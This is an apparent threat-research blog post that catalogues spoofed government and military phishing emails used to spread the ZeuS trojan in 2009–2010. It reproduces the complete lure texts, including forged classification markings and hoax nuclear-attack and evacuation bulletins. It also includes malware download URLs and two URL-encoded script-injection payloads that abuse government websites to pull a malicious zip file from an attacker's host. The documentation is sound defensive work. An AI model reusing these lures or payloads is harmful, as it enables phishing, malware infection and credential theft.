In “Crime or Espionage Part 1” I examined a series of attacks that appear to be aimed at those interested in intelligence issues and those in the government and military. The malware used in these attacks was ZeuS and there are common command and control elements used in the attacks beginning in December 2009 and continuing until late August 2010. In addition, these attacks have been linked to infrastructure used by the Kneber botnet, a ZeuS-based botnet discovered by Netwitness.
This post is an overview of a collection of publicly available emails associated with these ongoing series of attacks. These are the socially engineered emails designed to lure potential victims into clicking on and executing the attackers’ malicious code. While the attacks are not targeted down to the individual, or even institutional level, and appear to have been sent to a wide variety of targets, the content of the emails is geared towards those interested in intelligence, military and security issues.
The malicious emails appear to have been sent from email addresses associated with the following domain names: nsa.gov, greylogic.us, pentagon.af.mil, fbi.gov, dia.mil, dhs.gov, stratcom.mil and ifc.nato.int. With the exception of Jeff Carr’s Grey Logic, the emails appear to come from government and military sources. The subject lines and the text of the emails largely focus on security issues with some messages making use of classification markings such as “U//FOUO” and official looking email footers in order to appear to be legitimate.
The links in to the malicious files contained within the emails make use of a variety of hosts. The attackers will often include a link to the file sharing services rapidshare.com, sendspace.com and depositfiles.com. The attackers also use compromised legitimate websites, many of which are running the Joomla! CMS. However, at other times the attackers have used domain names registered specifically for malicious purposes:
dnicenter.com – abuseemaildhcp@gmail.com
dhsorg.org – hilarykneber@yahoo.com
The email addresses abuseemaildhcp@gmail.com and hilarykneber@yahoo.com are well known and have been used to register numerous domain names associated with malware, mostly ZeuS.
The “hilarykneber@yahoo.com” email address was made famous by discovery of the Kneber botnet by Netwitness. Netwitness revealed that many of the compromised computers in the US included government networks as well as Fortune 500 enterprises. This is not entirely surprising as any large botnet is likely to have compromised some government computers. But, the recognition of this fact may be the catalyst for the series of attacks using intelligence, military and security themes as lure. Not all compromised computers are of the same value, surely the attackers realize this. In “Conversations With a Blackhat” RSnake outlines this scenario:
There are already other types of bad guys who do things like spam, steal credentials and DDoS. For that to work they need a botnet with thousands or millions of machines. The chances of a million machine botnet having compromised at least one machine within a target of interest is relatively high.
So let’s say I’m badguy1 who wants to break into one or more companies of interest. Sure, I could work for days or weeks and maybe get into one or both of them, but at the risk of tipping my hand to the companies and there’s always a chance I’ll fail entirely. Or I could work with badguy2 who has a botnet. I could simply give a list of IPs, domains or email addresses of known targets to the bot herder and say that instead of paying a few cents to rent some arbitrary machine for a day, I’ll pay thousands of dollars to get a bot within the company I’m actually interested in.
A variation of this is a scenario in which the botmaster grows the botnet but through means that increase the chances of compromising a target of interest that “badguy1″ wants to compromise. By using intelligence, military and security issues and themes in the lure emails, perhaps the attackers are aiming to increase the likelihood of compromising a sensitive location. In such a scenario, the botmaster is happy to get some new bots connecting in with the Zeus command and control server (from which credentials and other information can be extracted) and can also sell any sensitive data that’s been stolen or sell access to any sensitive compromised computer.
The emails below are a collection of publicly available emails associated with a series of ongoing of attacks using Zeus.
December 9, 2009
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&t=48812&start=0
Source: http://contagiodump.blogspot.com/2009/12/creative-nsa-spoof-attack-of-day.html
From: ecu@nsa.gov
Date: December 9, 2009 4:33:51 PM GMT+05:00
Subject: CYBER-PMESII COMMANDER’S ANALYSIS OF FORECAST EFFECTSAFRL-RI-RS-TR-2009-136
Final Technical Report
December 2009CYBER-PMESII COMMANDER’S ANALYSIS OF FORECAST EFFECTS (CYBERCAFE)
INFORMATION SUBJECT TO EXPORT CONTROL LAWS
WARNING – This document contains technical data whose export is restricted by the Arms Export Control Act (Title 22, U.S.C., Sec 2751 et seq.) or the Export Administration Act of 1979, as amended (Title 50, U.S.C. App. 2401, et seq.). Violations of these export laws are subject to severe criminal penalties. Disseminate IAW DoDD 5230.25.
DESTRUCTION NOTICE – For classified documents, follow the procedures in DOD 5220.22-M, National Industrial Security Manual (NISPOM), section 5-705 or DOD 5200.1-R, Information Security Program, Chapter VI. For unclassified limited documents, destroy by any method that will prevent disclosure of contents or reconstruction of the document.
Export of the attached information (which includes, in some circumstances, release to foreign nationals within the United States) without first obtaining approval or license from the Department of State for items controlled by the International Traffic in ArmsRegulation (ITAR), or the Department of Commerce for items controlled by the Export Administration Regulation (EAR), may constitute a violation of law.
Download:
http://www.zeropaid.com/bbs/includes/CYBERCAFE.zip
or
http://rapidshare.com/files/318309046/CYBERCAFE.zip.html
http://www.sendspace.com/file/fmbt01
December 14, 2009
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&t=48812&start=0
Source: http://groups.yahoo.co.jp/group/boxing-fun/message/20326?threaded=1&viscount=14&expand=1
From: uctd@nsa.gov
Date: December 14, 2009 1:56:24 PM GMT+05:00
Subject: Information Systems Security ReminderInformation Systems Security Reminder
– Users are reminded to be aware and vigilant when using government information services both inside and outside protected environments.
– Be aware of your surroundings when accessing these services remotely, and prefer trusted workstations. Evaluate the security risks inherent with use of public workstations, including “shoulder surfing” by nearby persons.
– When communicating via email, know with whom you are communicating. Common adversary techniques include social engineering, email phishing, and evocative attachments. Government system capabilities may only be discussed with authorized personnel.
– If you make an error (e.g., data spill), report it so that the problem can be addressed. Report any anomalies you observe to your security office or service desk.
Security Software:
http://hkcaregroup.com/modlogan/MILSOFT.zip
or
http://rapidshare.com/files/320369638/MILSOFT.zip.html
http://fcpra.org/downloads/MILSOFT.zip
February 10, 2010
Source: http://www.nartv.org/2010/03/01/the-kneber-botnet-spear-phishing-attacks-and-crimeware/
From: jeffreyc@greylogic.us
Date: Wednesday, February 10, 2010 7:34 AM
Subject: Russian spear phishing attack against .mil and .gov employeesRussian spear phishing attack against .mil and .gov employees
A “relatively large” number of U.S. government and military employees are being taken in by a spear phishing attack which delivers a variant of the Zeus trojan. The email address is spoofed to appear to be from the NSA or InteLink concerning a report by the National Intelligence Council named the “2020 Project”. It’s purpose is to collect passwords and obtain remote access to the infected hosts.
Security Update for Windows 2000/XP/Vista/7 (KB823988)
About this download: A security issue has been identified that could allow an attacker to remotely compromise a computer running Microsoft(r) Windows(r) and gain complete control over it. You can help protect your
computer by installing this update from Microsoft. After you install this item, you may have to restart your computer.Download:
http://fcpra.org/downloads/winupdate.zip
or
http://www.sendspace.com/file/tj373l
___________
Jeffrey Carr is the CEO of GreyLogic, the Founder and Principal
Investigator of Project Grey Goose, and the author of “Inside Cyber Warfare”.
jeffreyc@greylogic.us
February 11, 2010
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&t=48812&start=0
Source: http://osdir.com/ml/general/2010-02/msg12517.html
From: jeffreyc@nsa.gov
Date: February 11, 2010 9:39:15 AM GMT+05:00
Subject: RE: Zeus Attack Spoofs NSA, Targets .gov and .milZeus Attack Spoofs NSA, Targets .gov and .mil
Criminals are spamming the Zeus banking Trojan in a convincing e-mail that spoofs the National Security Agency. Initial reports indicate that a large number of government systems may have been compromised by the attack.
According one state government security expert who received multiple copies of the message, the e-mail campaign — apparently designed to steal passwords from infected systems — was sent exclusively to government (.gov) and military (.mil) e-mail addresses.
The messages are spoofed so that they appear to have been sent by the National Intelligence Council (address used was nic@nsa.gov), which serves as the center for midterm and long-range strategic thinking for the U.S. intelligence community and reports to the office of the Director of National Intelligence.
Security Update for Windows 2000/XP/Vista/7 (KB823988)
About this download: A security issue has been identified that could allow an attacker to remotely compromise a computer running Microsoft® Windows® and gain complete control over it. You can help protect your computer by installing this update from Microsoft. After you install this item, you may have to restart your computer.
Download:
http://mv.net.md/update/update.zip
or
http://www.sendspace.com/file/7jmxtq
February 12, 2010
Source: http://www.blackfortressindustries.com/malware-analysis/e-mail-with-phishing-links/dod-roles-and-missions-in-homeland-security
From: apacs@pentagon.af.mil
Date: 12 Feb 2010 20:41:01 (GMT)
Subject: DoD Roles and Missions in Homeland SecurityDefense Science Board
DoD Roles and Missions in Homeland Security
VOLUME II – A: SUPPORTING REPORTS
This report is a product of the Defense Science Board (DSB). The DSB is a Federal Advisory Committee established to provide independent advice to the Secretary of Defense. Statements, opinions, conclusions and recommendations in this report do not necessarily represent the official position of the Department of Defense.
Download:
http://mv.net.md/dsb/DSB.zip
or
http://www.sendspace.com/file/rdxgzd
___________
Office of the Under Secretary of Defense
For Acquisition, Technology, and Logistics
Washington, D.C. 20301-3140
February 21, 2010
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&t=48812&start=0
Source: http://osdir.com/ml/general/2010-02/msg25834.html
From: cttd@fbi.gov
Date: February 21, 2010 7:37:16 AM GMT+05:00
Subject: INTELLIGENCE BULLETINFEDERAL BUREAU OF INVESTIGATION
INTELLIGENCE BULLETINFebruary 2010
Weapons of Mass Destruction Directorate
Indicators for Terrorist Use of Toxic Industrial Chemicals
THIS INTELLIGENCE BULLETIN PROVIDES LAW ENFORCEMENT AND OTHER PUBLIC SAFETY OFFICIALS WITH SITUATIONAL AWARENESS CONCERNING INTERNATIONAL AND DOMESTIC TERRORIST TACTICS.
UNCLASSIFIED//FOR OFFICIAL USE ONLY
Download:
http://timingsolution.com/Doc/BULLETIN.zip
or
http://www.sendspace.com/file/goz3yd
___________
HANDLING NOTICE: Recipients are reminded that FBI Intelligence Bulletins contain sensitive terrorism and counterterrorism information meant for use primarily within the law enforcement and homeland security communities. Such bulletins shall not be released, either in written or oral form, to the media, the general public, or other personnel who do not have a valid need-to-know without prior approval from an authorized FBI official, as such release could jeopardize national security.
March 6, 2010
Source: http://aquiacreek.com/showthread.php?1712-URGENT!-Phising-Email-Scam
Office of the Director of National Intelligence INTELLIGENCE BULLETIN UNCLASSIFIED//FOR OFFICIAL USE ONLY
(U//FOUO) DPRK has carried out nuclear missile attack on Japan
06 March 2010
(U//FOUO) Prepared by Defense Intelligence Agency
(U//FOUO) Today, March 06, 2010 at 7.12 AM local time (UTC/GMT -5 hours), US seismographic stations recorded seismic activity in the area of Okinawa Island (Japan). According to National Geospatial-Intelligence Agency, Democratic People’s Republic of Korea has carried out an average range missile attack with use of nuclear warhead. The explosion caused severe destructions in the northern part of the Okinawa island. Casualties among the personnel of the US military base are being estimated at the moment.
(U//FOUO) In connection with the occurred events, it is necessary for the personnel of the services listed below to be ready for immediate mobilization:
CENTRAL INTELLIGENCE AGENCY
DEFENSE INTELLIGENCE AGENCY
DEPARTMENT OF ENERGY:
OFFICE OF INTELLIGENCE AND COUNTERINTELLIGENCEDEPARTMENT OF HOMELAND SECURITY:
OFFICE OF INTELLIGENCE AND ANALYSISDEPARTMENT OF STATE:
BUREAU OF INTELLIGENCE AND RESEARCHDEPARTMENT OF THE TREASURY:
OFFICE OF INTELLIGENCE AND ANALYSISDRUG ENFORCEMENT ADMINISTRATION:
OFFICE OF NATIONAL SECURITY INTELLIGENCEFEDERAL BUREAU OF INVESTIGATION
NATIONAL SECURITY BRANCHNATIONAL GEOSPATIAL-INTELLIGENCE AGENCY
NATIONAL RECONNAISSANCE OFFICE
NATIONAL SECURITY AGENCY
UNITED STATES AIR FORCE
UNITED STATES ARMY
UNITED STATES COAST GUARD
UNITED STATES MARINE CORPS
UNITED STATES NAVY
________________(U//FOUO) Additional information can be found in the following report:
http://search.access.gpo.gov/GPO/Search.asp?ct=GPO&q1=%3c%61%20%68%72%65%66%3d%22%6 8%74%74%70%3a%2f%2f%64%6e%69%63%65%6e%74%65%72%2e% 63%6f%6d%2f%64%6f%63%73%2f%72%65%70%6f%72%74%2e%7a %69%70%22%3e%44%6f%77%6e%6c%6f%61%64%20%3c%2f%61%3 e%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f% 70%65%6e%28%27%68%74%74%70%3a%2f%2f%64%6e%69%63%65 %6e%74%65%72%2e%63%6f%6d%2f%64%6f%63%73%2f%72%65%7 0%6f%72%74%2e%7a%69%70%27%29%3c%2f%73%63%72%69%70% 74%3e
________________
Office of the Director of National Intelligence Washington, D.C. 20511
* The actual URL is: http://dnicenter.com/docs/report.zip
March 7, 2010
Source: http://www.blackfortressindustries.com/malware-analysis/e-mail-with-phishing-links/for-official-use-only—dprk-missile-attack-on-japan
Source: http://www.omninerd.com/articles/A_Short_Look_into_a_Phishing_Email
From: SSC@dia.mil
Date: 7 Mar 2010 14:17:51 (GMT)
Subject: FOR OFFICIAL USE ONLYOffice of the Director of National Intelligence
INTELLIGENCE BULLETIN
UNCLASSIFIED//FOR OFFICIAL USE ONLY(U//FOUO) DPRK has carried out nuclear missile attack on Japan
06 March 2010
(U//FOUO) Prepared by Defense Intelligence Agency
(U//FOUO) Today, March 06, 2010 at 11.46 AM local time (UTC/GMT -5 hours), US seismographic stations recorded seismic activity in the area of Okinawa Island (Japan). According to National Geospatial-Intelligence Agency, Democratic People’s Republic of Korea has carried out an average range missile attack with use of nuclear warhead. The explosion caused severe destructions in the northern part of the Okinawa island. Casualties among the personnel of the US military base are being estimated at the moment.
(U//FOUO) In connection with the occurred events, it is necessary for the personnel of the services listed below to be ready for immediate mobilization:
CENTRAL INTELLIGENCE AGENCY
DEFENSE INTELLIGENCE AGENCY
DEPARTMENT OF ENERGY:
OFFICE OF INTELLIGENCE AND COUNTERINTELLIGENCEDEPARTMENT OF HOMELAND SECURITY:
OFFICE OF INTELLIGENCE AND ANALYSISDEPARTMENT OF STATE:
BUREAU OF INTELLIGENCE AND RESEARCHDEPARTMENT OF THE TREASURY:
OFFICE OF INTELLIGENCE AND ANALYSISDRUG ENFORCEMENT ADMINISTRATION:
OFFICE OF NATIONAL SECURITY INTELLIGENCEFEDERAL BUREAU OF INVESTIGATION
NATIONAL SECURITY BRANCHNATIONAL GEOSPATIAL-INTELLIGENCE AGENCY
NATIONAL RECONNAISSANCE OFFICE
NATIONAL SECURITY AGENCY
UNITED STATES AIR FORCE
UNITED STATES ARMY
UNITED STATES COAST GUARD
UNITED STATES MARINE CORPS
UNITED STATES NAVY
________________(U//FOUO) Additional information can be found in the following report:
http://www.mod.gov.ge/2007/video/movie.php?l=G&v=%22%3e%3c%61%20%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%6f%66%66%69%63%69%61%6c%77%65%69%67%68%74%6c%6f%73%73%68%65%6c%70%2e%6f%72%67%2f%77%70%2d%61%64%6d%69%6e%2f%72%65%70%6f%72%74%2e%7a%69%70%22%3e%44%6f%77%6e%6c%6f%61%64%20%3c%2f%61%3e%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%70%65%6e%28%27%68%74%74%70%3a%2f%2f%6f%66%66%69%63%69%61%6c%77%65%69%67%68%74%6c%6f%73%73%68%65%6c%70%2e%6f%72%67%2f%77%70%2d%61%64%6d%69%6e%2f%72%65%70%6f%72%74%2e%7a%69%70%27%29%3c%2f%73%63%72%69%70%74%3e%3c%22
________________
Office of the Director of National Intelligence
Washington, D.C. 20511
* The actual URL is: http://officialweightlosshelp.org/wp-admin/report.zip
March 11, 2010
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&t=48812&start=0
Source: http://dl.ambiweb.de/mirrors/www.tldp.org/LDP/LGNET/173/lg_launderette.html
From: hsi@dhs.gov
Date: March 11, 2010 11:38:56 PM GMT+05:00
Subject: U.S. Department of Homeland SecurityDepartment of Homeland Security
INTELLIGENCE BULLETIN
UNCLASSIFIED11 March 2010
Yesterday the Department of Homeland Security has received the prevention from NASA’s Jet Propulsion Laboratory about the occurred shift of Earth’s figure axis:
________The recent Chilean earthquake shifted the axis by approximately three inches and shortened the length of a day by 1.26 microseconds. According to NASA’s Jet Propulsion Laboratory the displacement of Earth’s axis will cause natural disasters on the Eastern coast of the USA including Florida, Georgia, South and North Carolina.
________In this connection the DHS has made a decision to prepare for general evacuation from the specified area. The population of the region should be ready for evacuation. It is necessary collect valuable possessions, documents, things of first necessity, and wait for the announcement.
In order to prevent panic among the population DHS asks to stay calm and follow the official instructions listed below:
http://dhsorg.org/docs/instructions.zip
________________
U.S. Department of Homeland Security
Washington, DC 20528
March 13, 2010
Source: http://www.blackfortressindustries.com/malware-analysis/e-mail-with-phishing-links/re-instructions-unclassified
From: NSI@dhs.gov
Date: 13 Mar 2010 18:26:54 (GMT)
Subject: RE: Instructions UNCLASSIFIEDU.S. Department of Homeland Security
INTELLIGENCE BULLETIN
UNCLASSIFIED13 March 2010
Yesterday the Department of Homeland Security has received the prevention from NASA’s Jet Propulsion Laboratory about the occurred shift of Earth’s figure axis:
______________________The recent Chilean earthquake shifted the axis by approximately three inches and shortened the length of a day by 1.26 microseconds. According to NASA’s Jet Propulsion Laboratory the displacement of Earth’s axis will cause natural disasters on the Eastern coast of the USA including Florida, Georgia, South and North Carolina.
______________________In this connection the DHS has made a decision to prepare for general evacuation from the specified area. The population of the region should be ready for evacuation. It is necessary collect valuable possessions, documents, things of first necessity, and wait for the announcement.
In order to prevent panic among the population DHS asks to stay calm and follow the official instructions listed below:
http://www.sendspace.com/file/h96uh1
or
http://depositfiles.com/files/xj1wvamc4
________________________________________
U.S. Department of Homeland Security
Washington, DC 20528
June 16, 2010
Source: http://www.clearancejobs.com/security_tips.php
From: rss@stratcom.mil
Date: Wed Jun 16 13:10:08 2010
Subject: From STRATCOM to,
United States Strategic Command
Commanders Reading List
Professional development is essential to the successful execution of our mission – to provide global security for America. One key component to professional development is reading and critically thinking about military issues, history, and leadership. I am pleased to announce the following selections for my 2010 Commander’s Professional Reading List. It is my intent that this list will serve as a guide for all STRATCOM military and civilian personnel to enhance their professional knowledge.
All of the titles below are available immediately for check-out at the Thomas S. Power Library on base and in the USSTRATCOM Leadership Institute.
Our overarching objective is to provide global security to our nation-the best in the world. I encourage everyone to read these titles and continue your professional development so you can continue to be the finest operators, planners, and advocates for STRATCOM and its global mission set.
KEVIN P. CHILTON
General, USAF
CommanderInside Cyber Warfare: Mapping the Cyber Underworld (Dec 2009)
This book provides fascinating and disturbing details on how nations, groups, and individuals throughout the world are using the Internet as an attack platform to gain military, political, and economic advantages over their adversaries. Discusses how sophisticated hackers, working on behalf of states or organized crime, patiently play a high-stakes game targeting anyone, regardless of affiliation or nationality. (Amazon.com)
Author: Jeffrey Carr is a cyber intelligence expert, columnist for Symantec’s Security Focus, and author who specializes in the investigation of cyber attacks against governments and infrastructures by State and Non-State hackers. Mr. Carr is the Principal Investigator for Project Grey Goose, an Open Source intelligence investigation into the Russian cyber attacks on Georgia in August, 2008. His work has been quoted in The New York Times, The Washington Post, The Guardian, BusinessWeek, Parameters, and Wired.
Additional information can be found in the following report:
http://tiesiog.puikiai.lt/report.zip
http://somashop.lv/report.zip
________________________________________
To report a problem please submit an ODNI/ICES Ticket
Phone: 301-688-1800 (commercial), 644-1800 (DSN), 363-6105 (NSTS)”
June 17, 2010
Source: http://kerneltrap.org/mailarchive/openbsd-bugs/2010/6/17/6884952
Source: http://www.mail-archive.com/ports@openbsd.org/msg28673.html
From: izhar.mujaddid@pentagon.af.mil
Date: Thursday, June 17, 2010 – 11:57 am
Subject: Scientific Advisory BoardUNCLASSIFIED//FOR OFFICIAL USE ONLY
United States Air Force
Scientific Advisory Board
Report on Defending and Operating in a Contested Cyber Domain
Executive Summary and Annotated Brief
SAB-TR-10-01
June 2010This report is a product of the United States Air Force Scientific Advisory
Board Study Committee on Defending and Operating in a Contested Cyber
Domain. Statements, opinions, findings, recommendations and conclusions
contained in this report are those of the Study Committee and do not
necessarily represent the official position of the United States Air Force or the United States Department of Defense.Additional information can be found in the following report:
http://www.christianrantsen.dk/report.zip
http://enigmazones.eu/report.zip
________________________________________
HQ USAF/SB
1180 AF PENTAGON RM 5D982
WASHINGTON, DC 20330-1180
June 17, 2010
Source: http://permalink.gmane.org/gmane.linux.debian.qa-packages/33936
From: tsa@dhs.gov
Date: 2010-06-17 18:01:16 GMT
Subject: (U) Transportation Security AdministrationUNCLASSIFIED//FOR OFFICIAL USE ONLY
(U) Transportation Security Administration
(U) Terrorist Attack Methods in Airport Terminals
A Predictive Analysis for the Detection-Technology Community
15 June 2010
(U//FOUO) This Transportation Security Administration Office of Intelligence (TSA-OI)
assessment, developed at the request of the TSA Office of Security Technology,
examines the terrorist tactics used to attack passengers inside the public areas of an
airport terminal in order to assist in developing security procedures and deploying threat
detection technology to this area. This assessment examined a number of unclassified
sources detailing disrupted plots, bombings, suicide bombers, and armed assaults
conducted in the public areas of airports from the 1960s to the present. Additionally,
attacks on other critical infrastructure targets were reviewed in order to assess which
tactics are more likely to be considered by terrorists targeting airport terminals.Additional information can be found in the following report:
http://www.christianrantsen.dk/report.zip
http://enigmazones.eu/report.zip
________________________________________
Department of Homeland Security
Office of Infrastructure Protection
Infrastructure Security Compliance Division
Mail Stop 8100
Washington, DC 20528
* A variety of these emails are also available at: http://www.sophos.com/blogs/sophoslabs/?p=10116
August 26, 2010
Source: http://contagiodump.blogspot.com/2010/08/cve-2010-1240-with-zeus-trojan.html
From: ifc@ifc.nato.int
Date: Thu, 26 Aug 2010 08:24:30 -0500
Subject: From Intelligence Fusion CentreIntelligence Fusion Centre
In support of NATO
RAF Molesworth, United Kingdom
Unit 8845 Box 300, Huntingdon
CAMBS PE28 0QBFROM: Intelligence Fusion Centre
SUBJECT: Military operation of the EUAdditional information can be found in the following report:
http:// gnarus.mobi/media/EuropeanUnion_MilitaryOperations_EN. zip
http:// quimeras.com.mx/media/EuropeanUnion_MilitaryOperations_EN.ip> EUROPEAN UNION
> EUROPEAN SECURITY AND DEFENCE POLICY
> Military operation of the EU
> EU NAVFOR Somalia
>
> This military operation, called EU NAVFOR Somalia – operation
> “Atalanta”, is launched in support of Resolutions 1814 (2008), 1816
> (2008), 1838 (2008) and 1846 (2008) of the United Nations Security Council (UNSC) in order to contribute to:
> – the protection of vessels of the WFP (World Food Programme) delivering food aid to displaced
> persons in Somalia;
> – the protection of vulnerable vessels cruising off the Somali coast, and the deterrence, prevention
> and repression of acts of piracy and armed robbery off the Somali coast.
> This operation, which is the first EU maritime operation, is conducted
> in the framework of the European Security and Defence Policy (ESDP).
>
>
> More information and background documents available on
> http:// gnarus.mobi/media/EuropeanUnion_MilitaryOperations_EN. zip
> and
> http:// quimeras.com.mx/media/EuropeanUnion_MilitaryOperations_EN. zip
>
> ________________________________________
> PRESS – EU Council Secretariat Tel: +32 (0)2 281 7640 / 6319